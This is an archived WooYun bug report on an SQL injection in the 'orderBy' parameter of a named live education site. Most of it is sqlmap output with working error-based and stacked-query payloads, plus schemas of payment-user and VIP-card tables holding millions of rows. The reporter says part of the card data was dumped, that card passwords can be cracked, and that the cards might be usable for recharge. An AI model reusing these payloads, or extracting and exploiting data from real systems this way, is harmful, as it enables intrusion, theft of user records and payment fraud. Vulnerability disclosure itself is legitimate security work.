乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-21: 细节已通知厂商并且等待厂商处理中 2015-01-22: 厂商已经确认,细节仅向厂商公开 2015-02-01: 细节向核心白帽子及相关领域专家公开 2015-02-11: 细节向普通白帽子公开 2015-02-21: 细节向实习白帽子公开 2015-03-07: 细节向公众公开
怎么都走小厂商流程了?求前台
http://liuying.ciwong.com/web/work/_DesignWorkList?0.0916321964468807 (POST)gradePhase=1&workType=4&title=e&orderBy=FinalistOn&orderByType=1&pageCurrent=1
其中orderBy字段未过滤。
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: orderBy (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: gradePhase=1&workType=4&title=e&orderBy=FinalistOn AND (SELECT 5842 FROM(SELECT COUNT(*),CONCAT(0x71766a7871,(SELECT (CASE WHEN (5842=5842) THEN 1 ELSE 0 END)),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&orderByType=1&pageCurrent=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: gradePhase=1&workType=4&title=e&orderBy=FinalistOn; SELECT SLEEP(5)-- &orderByType=1&pageCurrent=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: MySQL 5.0current user: 'ciwong_it@%'720多万用户信息:Database: cw_payTable: pay_user[9 columns]+---------------+--------------+| Column | Type |+---------------+--------------+| amount | double || is_lock | tinyint(4) || lock_amount | double || password | varchar(128) || password_salt | varchar(128) || un_lock_time | datetime || update_time | datetime || user_id | bigint(20) || user_name | varchar(50) |+---------------+--------------+
+----------+---------+| Table | Entries |+----------+---------+| pay_user | 7256464 |+----------+---------+
不过dump后发现很多都是空记录
100多万VIP卡信息:
current user: 'ciwong_it@%'Database: cw_payTable: vip_card[7 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| begin_time | datetime || card_id | varchar(10) || card_pwd | varchar(50) || card_type | tinyint(4) || create_time | datetime || expire_time | datetime || status | tinyint(4) |+-------------+-------------+
+----------+---------+| Table | Entries |+----------+---------+| vip_card | 1491556 |+----------+---------+
dump了部分信息,卡密码可以上cmd5解密,8位数字卡密
貌似可以拿来充值....,未进一步验证
1//过滤2//限制表访问
危害等级:高
漏洞Rank:19
确认时间:2015-01-22 14:43
漏洞修复中...
暂无